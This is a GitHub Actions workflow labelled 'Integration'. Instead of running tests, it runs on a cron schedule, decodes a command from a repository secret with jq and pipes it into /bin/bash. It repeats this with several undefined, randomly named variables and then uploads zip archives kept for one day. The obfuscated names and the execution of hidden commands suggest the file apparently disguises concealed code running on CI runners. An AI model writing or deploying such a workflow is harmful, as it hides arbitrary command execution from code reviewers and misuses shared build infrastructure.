name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '32 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          po95: ${{ secrets.po95 }}
        run: |
          printf '%s' "$po95" | jq -r .cx75 | /bin/bash
          echo $lyepy1 | jq -r .lerkf45500 | /bin/bash
          echo $y9812 | jq -r .jpygm176 | /bin/bash
          printf '%s' "$abtwd982" | jq -r .iamuw571 | /bin/bash
          echo $ddtyg41920 | jq -r .xxvu68 | /bin/bash
          echo $e47753 | jq -r .i09 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: ohqsI7sm
          path: "*.zip"
          retention-days: 1
